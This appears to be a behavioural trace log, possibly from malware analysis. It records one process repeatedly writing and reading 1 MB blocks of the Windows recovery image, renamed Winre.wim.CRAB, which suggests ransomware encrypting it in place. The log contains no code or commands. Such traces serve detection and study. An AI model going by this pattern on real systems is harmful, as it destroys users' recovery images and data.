File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
